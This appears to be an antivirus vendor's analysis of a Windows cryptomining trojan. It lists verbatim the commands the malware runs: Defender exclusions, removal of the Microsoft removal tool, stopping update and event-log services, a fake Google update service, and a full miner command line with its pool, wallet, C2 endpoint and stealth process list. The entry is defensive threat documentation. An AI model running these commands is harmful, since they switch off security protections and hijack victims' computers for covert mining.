Trojan.Win64.MALXMR.CJDR

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It adds services similar to legitimate applications' to trick a user into thinking they are legitimate.

It connects to certain websites to send and receive information. It uses the system's central processing unit (CPU) and/or graphical processing unit (GPU) resources to mine cryptocurrency.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan drops a copy of itself in the following folders using different file names:

• %ProgramData%\Google\Chrome\updater.exe

(Note: %ProgramData% is a version of the Program Files folder where any user on a multi-user computer can make changes to programs. This contains application data for all users. This is usually C:\ProgramData on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit), or C:\Documents and Settings\All Users on Windows Server 2003(32-bit), 2000(32-bit) and XP.)

It adds the following processes:

• powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force → adds the user profile and program data directories to the exclusion list for Windows Defender to bypass scanning specific folders and .exe files.
• cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart → quietly uninstalls the Microsoft Malicious Software Removal Tool (KB890830) without restarting the computer.
• c.exe stop UsoSvc → stops the Update Orchestrator Service, which manages Windows Updates
• sc.exe stop WaaSMedicSvc → stops the Windows Update Medic Service, which ensures the proper functioning of Windows Update components
• sc.exe stop wuauserv → stops the Windows Update service to halt automatic updates
• sc.exe stop bits → stops the Background Intelligent Transfer Service, used by Windows Update for downloading updates
• sc.exe stop dosvc → stops the Delivery Optimization service, which handles peer-to-peer update sharing
• powercfg.exe /x -hibernate-timeout-ac 0 → disables the hibernate timeout for computers on AC power
• powercfg.exe /x -hibernate-timeout-dc 0 → disables the hibernate timeout for computers on battery power
• powercfg.exe /x -standby-timeout-ac 0 → disables the standby timeout for computers on AC power
• powercfg.exe /x -standby-timeout-dc 0 → disables the standby timeout for computers on battery power
• sc.exe delete "GoogleUpdateTaskMachineQC" → deletes existing service named "GoogleUpdateTaskMachineQC"
• sc.exe create "GoogleUpdateTaskMachineQC" binpath= "%ProgramData%\Google\Chrome\updater.exe" start= "auto" → creates a new service that points to the dropped copy of itself
• sc.exe stop eventlog → stops the Windows Event Log service
• sc.exe start "GoogleUpdateTaskMachineQC" → starts the newly created service.
• explorer.exe --algo=rx/0 --url=xmr.2miners.com:12222 --user=86EBNigoaCXSio7ySVmzWpQKwD6L2LAsFFhfZEFbqiivD4n2BdrXF4XKcXAFHLS7hsRcYW3WXpQZqgkWuFR66QeqMx3AV4S --pass=x --cpu-max-threads-hint=20 --cinit-winring=mhhvoejiojwd.sys --cinit-stealth-targets=Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,PLlhDBWxRt.exe,GPU-Z.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe --cinit-api=http://cdnupdateservice.com/api/endpoint.php --cinit-version=3.4.0 --tls --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-id=tjnooobwkhcgvgyn → runs a hidden Monero mining process disguised as a legitimate process and using stealth parameters to avoid detection by various applications

It adds the following services similar to legitimate applications' to trick a user into thinking they are legitimate:

• Service Name: GoogleUpdateTaskMachineQC
  Type: Own process
  Binary Path: %ProgramData%\Google\Chrome\updater.exe
  Start type: Auto start

(Note: %ProgramData% is a version of the Program Files folder where any user on a multi-user computer can make changes to programs. This contains application data for all users. This is usually C:\ProgramData on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit), or C:\Documents and Settings\All Users on Windows Server 2003(32-bit), 2000(32-bit) and XP.)

Other System Modifications

This Trojan adds the following registry entries:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\MRT
DontOfferThroughWUAU = 1 → disables offering Microsoft Removal Tool updates through Windows Update

It modifies the following registry keys:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
services\wuauserv
Renamed to wuauserv_bkp → results in Windows Update service to stop working

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
services\BITS
Renamed to BITS_bkp → results in Background Intelligent Transfer Service to stop working

Other Details

This Trojan adds the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\MRT

It connects to the following website to send and receive information:

• http://{BLOCKED}.{BLOCKED}.{BLOCKED}.251
  which redirects to:
  • http://{BLOCKED}ateservice.com/api/endpoint.php
• {BLOCKED}.{BLOCKED}.{BLOCKED}.184:1222
  which redirects to:
  • {BLOCKED}ners.com:12222
    which redirects again to:
    • {BLOCKED}ners.com:12222 → mining pool

It does the following:

• It utilizes binary padding to increase its own file size and evade detection.
• It uses up to 20 CPU threads for mining, potentially slowing down the system.
• It injects its mining process to explorer.exe and hides itself from detection from the following applications:
  • GPU-Z.exe
  • perfmon.exe
  • ProcessHacker.exe
  • procexp.exe
  • procexp64.exe
  • Taskmgr.exe
  • arma3_x64.exe
  • arma3.exe
  • bf4.exe
  • BlackOpsColdWar.exe
  • Borderlands2.exe
  • Borderlands3.exe
  • CK2game.exe
  • ck3.exe
  • csgo.exe
  • Cyberpunk2077.exe
  • DeadByDaylight-Win64-Shipping.exe
  • EliteDangerous64.exe
  • enlisted.exe
  • EscapeFromTarkov.exe
  • FactoryGame.exe
  • Falluot4.exe
  • FarCry5.exe
  • ffxiv_dx11.exe
  • ffxiv.exe
  • FIFA21.exe
  • FiveM_b2189_GTAProcess.exe
  • FiveM_GTAProcess.exe
  • FiveM.exe
  • FortniteClient-Win64-Shipping.exe
  • ForzaHorizon4.exe
  • GenshinImpact.exe
  • GTA5.exe
  • iw6sp64_ship.exe
  • League of Legends.exe
  • LeagueClientUx.exe
  • left4dead2.exe
  • Little_Nightmares_II_Enhanced-Win64-Shipping.exe
  • ModernWarfare.exe
  • NarakaBladepoint.exe
  • NarakaBladepoint.exe
  • NBA2K21.exe
  • NBA2K22.exe
  • NMS.exe
  • Phasmophobia.exe
  • PlanetCoaster.exe
  • PointBlank.exe
  • PortalWars-Win64-Shipping.exe
  • r5apex.exe
  • RainbowSix_BE.exe
  • RainbowSix.exe
  • RDR2.exe
  • re8.exe
  • RocketLeague.exe
  • RogueCompany.exe
  • RustClient.exe
  • ShooterGame_BE.exe
  • ShooterGame.exe
  • ShooterGameServer.exe
  • SoTGame.exe
  • SRTTR.exe
  • stellaris.exe
  • TEKKEN7.exe
  • Tiger-Win64-Shipping.exe
  • TslGame.exe
  • VALORANT.exe
  • VRChat.exe
  • Warframe.x64.exe
  • WatchDogsLegion.exe
  • WorldOfTanks.exe
  • zula.exe
  • acad.exe
  • Adobe Premiere Pro.exe
  • AfterFX.exe
  • Photoshop.exe
  • VideoEditorPlus.exe
  • AndroidEmulatorEn.exe
  • PLlhDBWxRt.exe
• It throttles down CPU usage to 90% if the system is idle.
• It uses the following version of XMR mining application:
  • 3.4.0
• It mines the following cryptocurrency coin:
  • Monero (XMR)

It uses the system's central processing unit (CPU) and/or graphical processing unit (GPU) resources to mine cryptocurrency. This behavior makes the system run abnormally slow.